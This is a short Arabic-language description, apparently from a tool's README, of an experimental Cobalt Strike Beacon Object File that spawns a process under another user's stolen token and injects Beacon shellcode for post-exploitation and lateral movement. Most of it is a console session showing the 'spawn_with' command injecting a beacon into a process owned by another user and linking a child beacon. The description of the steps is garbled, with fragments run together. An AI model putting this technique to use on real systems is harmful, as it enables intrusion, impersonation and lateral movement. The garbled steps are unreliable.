
أداة Cobalt Strike BOF تقوم بتشغيل عملية باستخدام توكن مستخدم آخر وحقن شيل كود Beacon، مما يتيح عمليات ما بعد الاستغلال والحركة الجانبية عبر انتحال الهوية.
ملف كائن Beacon تجريبي (BOF) يوفر بديلًا لأمرَي spawnas و inject. يعرض هذا الملف أمرًا جديدًا، spawn_with [pid] [listener]، يقوم بما يلي:
spawnto الخاصة بـ Beacon.CreateProcessWithTokenW.
CreateProcessAsUserW.beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)
beacon> ps
22656 21972 wordpad.exe x64 1 DESKTOP-1U6AHIU\test_user
beacon> spawnto x64 %windir%\sysnative\notepad.exe
beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:
Spawned PID 45668 and injected 297472 bytes
[+] established link to child beacon: 192.168.0.195
